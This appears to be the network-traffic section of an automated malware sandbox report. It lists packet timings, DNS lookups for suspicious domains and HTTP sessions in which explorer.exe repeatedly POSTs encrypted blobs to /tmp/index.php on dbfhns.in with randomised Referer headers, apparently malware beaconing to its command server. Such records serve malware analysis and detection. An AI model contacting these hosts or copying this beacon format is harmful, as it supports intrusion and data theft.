                                                                              May 26, 2024 10:23:35.506154060 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.506166935 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.506191969 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.506211996 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.530766964 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.530831099 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.530857086 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.530869007 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.530895948 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.530913115 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.539414883 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.539454937 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.539489031 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.539500952 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.539526939 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.539777994 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.543776035 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.543848038 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.543862104 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.543874979 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.543906927 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.543926954 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.553251028 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.553308964 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.553426027 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.553442955 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.553549051 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.559868097 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.559942961 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.559976101 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.559990883 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.560015917 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.560580015 CEST52683443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:35.574841022 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:35.574867010 CEST4435268365.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:46.593024015 CEST52690443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:46.593024015 CEST52690443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:46.593034029 CEST4435269065.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:46.593063116 CEST4435269065.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:47.368788958 CEST4435269065.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:47.368844032 CEST52690443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:47.368849039 CEST4435269065.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:47.368892908 CEST52690443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:47.458508015 CEST52690443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:47.458523989 CEST4435269065.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:47.967303991 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:47.967339039 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:47.967447996 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:47.967993975 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:47.968007088 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:48.676268101 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:48.676368952 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.678646088 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.678653002 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:48.678723097 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.678728104 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:48.678783894 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.678801060 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:48.678864002 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.678879023 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:48.678889036 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.678899050 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:48.678952932 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.678972006 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.678981066 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.679039001 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:48.679116011 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.679136038 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:48.679182053 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:48.679193974 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:50.102350950 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:50.102401972 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:50.102463961 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:50.102463961 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:50.103038073 CEST52691443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:50.103053093 CEST4435269165.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:50.324059963 CEST52692443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:50.324167967 CEST4435269265.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:50.324258089 CEST52692443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:50.324536085 CEST52692443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:50.324574947 CEST4435269265.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:51.011879921 CEST4435269265.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:51.011946917 CEST52692443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:51.012599945 CEST52692443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:51.012623072 CEST4435269265.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:51.013849020 CEST52692443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:51.013860941 CEST4435269265.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:51.831007957 CEST4435269265.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:51.831048012 CEST4435269265.109.242.59192.168.2.4
                                                                              May 26, 2024 10:23:51.831079006 CEST52692443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:51.831146002 CEST52692443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:51.840533018 CEST52692443192.168.2.465.109.242.59
                                                                              May 26, 2024 10:23:51.840570927 CEST4435269265.109.242.59192.168.2.4
                                                                              May 26, 2024 10:24:18.304014921 CEST5269380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:18.309389114 CEST8052693190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:18.309494972 CEST5269380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:18.309649944 CEST5269380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:18.309684038 CEST5269380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:18.371579885 CEST8052693190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:18.426820993 CEST8052693190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:19.314668894 CEST8052693190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:19.319411039 CEST8052693190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:19.319483995 CEST5269380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:19.319619894 CEST5269380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:19.372612953 CEST8052693190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:23.632352114 CEST5269480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:23.637770891 CEST8052694190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:23.637859106 CEST5269480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:23.638001919 CEST5269480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:23.638021946 CEST5269480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:23.698743105 CEST8052694190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:23.751648903 CEST8052694190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:24.615850925 CEST8052694190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:24.620487928 CEST8052694190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:24.620619059 CEST5269480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:24.624795914 CEST5269480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:24.675748110 CEST8052694190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:28.872061968 CEST5269580192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:28.877271891 CEST8052695190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:28.877373934 CEST5269580192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:28.877506018 CEST5269580192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:28.877542973 CEST5269580192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:28.928530931 CEST8052695190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:28.979317904 CEST8052695190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:29.891668081 CEST8052695190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:29.896589041 CEST8052695190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:29.896656990 CEST5269580192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:29.896692991 CEST5269580192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:29.949645042 CEST8052695190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:36.571837902 CEST5269680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:36.577092886 CEST8052696190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:36.577219009 CEST5269680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:36.577363968 CEST5269680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:36.577398062 CEST5269680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:36.630912066 CEST8052696190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:36.684793949 CEST8052696190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:37.609268904 CEST8052696190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:37.614059925 CEST8052696190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:37.614357948 CEST5269680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:37.615842104 CEST5269680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:37.664429903 CEST8052696190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:41.905549049 CEST5269780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:41.911307096 CEST8052697190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:41.911526918 CEST5269780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:41.911621094 CEST5269780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:41.911622047 CEST5269780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:41.964528084 CEST8052697190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:42.011746883 CEST8052697190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:42.969783068 CEST8052697190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:42.974500895 CEST8052697190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:42.974817038 CEST5269780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:42.978286028 CEST5269780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:43.028487921 CEST8052697190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:47.089485884 CEST5269880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:47.094954967 CEST8052698190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:47.095042944 CEST5269880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:47.097794056 CEST5269880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:47.097794056 CEST5269880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:47.148850918 CEST8052698190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:47.199426889 CEST8052698190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:48.101244926 CEST8052698190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:48.105995893 CEST8052698190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:48.106298923 CEST5269880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:48.106298923 CEST5269880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:24:48.156569958 CEST8052698190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:24:58.750807047 CEST5273680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:24:58.756357908 CEST8052736185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:24:58.756452084 CEST5273680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:24:58.756613970 CEST5273680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:24:58.756638050 CEST5273680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:24:58.812228918 CEST8052736185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:24:58.812242031 CEST8052736185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:24:59.751699924 CEST8052736185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:24:59.756755114 CEST8052736185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:24:59.756839991 CEST5273680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:24:59.757996082 CEST5273680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:24:59.766848087 CEST8052736185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:03.651160955 CEST5273780192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:03.656785011 CEST8052737185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:03.656891108 CEST5273780192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:03.657069921 CEST5273780192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:03.657107115 CEST5273780192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:03.708429098 CEST8052737185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:03.759327888 CEST8052737185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:04.611924887 CEST8052737185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:04.618882895 CEST8052737185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:04.618990898 CEST5273780192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:04.619036913 CEST5273780192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:04.672513008 CEST8052737185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:11.181008101 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:11.186208963 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:11.186455011 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:11.186455011 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:11.186582088 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:11.240886927 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:11.291532040 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:12.106934071 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:12.111613989 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:12.111825943 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:12.111826897 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:12.164419889 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:16.436652899 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:16.590189934 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:16.590383053 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:16.590425968 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:16.590435982 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:16.600128889 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:16.651616096 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:17.742655993 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:17.747401953 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:17.747632027 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:17.747632027 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:17.804409981 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.034235001 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.039762020 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.040004969 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.040106058 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.040106058 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.092696905 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.143673897 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.960156918 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.964894056 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.965066910 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.965066910 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:23.020639896 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:29.332760096 CEST5274180192.168.2.4185.18.245.58
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| May 26, 2024 10:22:20.777978897 CEST | 192.168.2.4 | 1.1.1.1 | 0xe333 | Standard query (0) | dbfhns.in | A (IP address) | IN (0x0001) | false |
| May 26, 2024 10:22:21.781243086 CEST | 192.168.2.4 | 1.1.1.1 | 0xe333 | Standard query (0) | dbfhns.in | A (IP address) | IN (0x0001) | false |
| May 26, 2024 10:22:22.997822046 CEST | 192.168.2.4 | 1.1.1.1 | 0xe333 | Standard query (0) | dbfhns.in | A (IP address) | IN (0x0001) | false |
| May 26, 2024 10:22:33.956954002 CEST | 192.168.2.4 | 1.1.1.1 | 0xf4f8 | Standard query (0) | whispedwoodmoodsksl.shop | A (IP address) | IN (0x0001) | false |
| May 26, 2024 10:23:07.353275061 CEST | 192.168.2.4 | 1.1.1.1 | 0xde66 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| May 26, 2024 10:24:54.770073891 CEST | 192.168.2.4 | 1.1.1.1 | 0x60be | Standard query (0) | dbfhns.in | A (IP address) | IN (0x0001) | false |
| May 26, 2024 10:24:55.765544891 CEST | 192.168.2.4 | 1.1.1.1 | 0x60be | Standard query (0) | dbfhns.in | A (IP address) | IN (0x0001) | false |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.4 | 49736 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe |

Timestamp | Bytes transferred | Direction | Data
May 26, 2024 10:22:23.170190096 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://xdtlvnnwnlpkuygk.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 125
                                                                              Host: dbfhns.in
May 26, 2024 10:22:24.188839912 CEST | 152 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:24 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 04 00 00 00 72 e8 85 ec
                                                                              Data Ascii: r


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 1 | 192.168.2.4 | 49737 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe |

Timestamp | Bytes transferred | Direction | Data
May 26, 2024 10:22:24.295938969 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ytvhsyvyrbixtfi.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 239
                                                                              Host: dbfhns.in
May 26, 2024 10:22:25.494138956 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:25 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 2 | 192.168.2.4 | 49738 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe |

Timestamp | Bytes transferred | Direction | Data
May 26, 2024 10:22:25.599878073 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://txpgggtypbkripei.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 309
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:25.599878073 CEST | 309 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 4b 5d d0 aa
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuK]{6U65+yLCdVwc],}Z:bnL43E'..\B^|:@i:!xQ)Rvsa,Pk
                                                                              May 26, 2024 10:22:26.634282112 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:26 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.2.4 | 49739 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:26.743766069 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://nwyllkfdfrdb.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 181
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:26.743766069 CEST | 181 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2f 28 b3 f1
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vu/(kktDL2B]#<(L:/F8FB?cm o10
                                                                              May 26, 2024 10:22:27.739417076 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:27 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              4 | 192.168.2.4 | 49740 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:28.089696884 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://jpbahollcwbghe.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 118
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:28.089696884 CEST | 118 | OUT | Data Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 49 36 fa e4
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuI6NE{[mn&Epgp[[
                                                                              May 26, 2024 10:22:28.865943909 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:28 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              5 | 192.168.2.4 | 49741 | 190.28.110.209 | 80 | 2580 | C:\Windows\explorer.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 26, 2024 10:22:30.290385008 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://oygcwhbcxoopv.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 278
                                                                              Host: dbfhns.in
